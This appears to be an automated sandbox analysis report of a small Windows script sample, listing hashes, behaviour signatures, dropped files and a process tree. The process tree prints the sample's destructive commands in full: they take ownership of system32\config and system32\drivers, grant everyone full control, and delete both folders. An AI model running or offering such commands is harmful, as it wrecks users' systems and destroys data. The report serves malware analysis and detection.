Analysis

  • max time kernel
    119s
  • max time network
    126s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
  • submitted
    15-08-2024 21:30

General

  • Target

    script.wsf

  • Size

    2KB

  • MD5

    cef6ac1c7b72212cb9b26421ba748362

  • SHA1

    05858a591fc90a1af835454aee11b7d893649517

  • SHA256

    92a5545652c35328d20dc8bb70348ebda3b1eb49b1c0f111976ab3912de1801a

  • SHA512

    435bcf3fa63381455db93dc4f13be02a276e351721a726fcea1c5a2ef93037e09bac09c5dbaf76b1ceb9e97a39d360a73fd9a7316f32b1c582e4bc738fe21e1c

Score
8/10

Malware Config

Signatures

  • Possible privilege escalation attempt 4 IoCs
  • Modifies file permissions 1 TTPs 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 21 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "copy C:\Users\Admin\AppData\Local\Temp\script.wsf thescript.vbs && start thescript.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2372
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\thescript.vbs"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:320
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\config\* >nul && icacls c:\windows\system32\config\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\config\* >nul 2>&1
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2824
        • C:\Windows\system32\takeown.exe
          takeown /f c:\windows\system32\config\*
          4⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:2636
        • C:\Windows\system32\icacls.exe
          icacls c:\windows\system32\config\* /grant everyone:(f)
          4⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:2316
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\drivers\* >nul && icacls c:\windows\system32\drivers\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\drivers\* >nul 2>&1
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2808
        • C:\Windows\system32\takeown.exe
          takeown /f c:\windows\system32\drivers\*
          4⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          • Suspicious use of AdjustPrivilegeToken
          PID:2632
        • C:\Windows\system32\icacls.exe
          icacls c:\windows\system32\drivers\* /grant everyone:(f)
          4⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:2772
  • C:\Windows\system32\wbem\WMIADAP.EXE
    wmiadap.exe /F /T
    1⤵
      PID:2152

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\thescript.vbs

      Filesize

      2KB

      MD5

      cef6ac1c7b72212cb9b26421ba748362

      SHA1

      05858a591fc90a1af835454aee11b7d893649517

      SHA256

      92a5545652c35328d20dc8bb70348ebda3b1eb49b1c0f111976ab3912de1801a

      SHA512

      435bcf3fa63381455db93dc4f13be02a276e351721a726fcea1c5a2ef93037e09bac09c5dbaf76b1ceb9e97a39d360a73fd9a7316f32b1c582e4bc738fe21e1c

    • C:\Users\Admin\Desktop\DebugPublish.vbs

      Filesize

      98B

      MD5

      4b91264568ac2162700be36338c095e8

      SHA1

      c95726edf8303e6adabcb12ffdca90b51349990a

      SHA256

      2c8545e54e8fbc28791314d7327886237c66b70640d069f276a35b6c3322c037

      SHA512

      e57319453e5da3407ccc77cb3ee6200592e1916932cae467bbf77722f3ff49e5853b4b4d2eeb3092dbb2e22346f56617cc785744771bb3648bf4561feb0e9e1b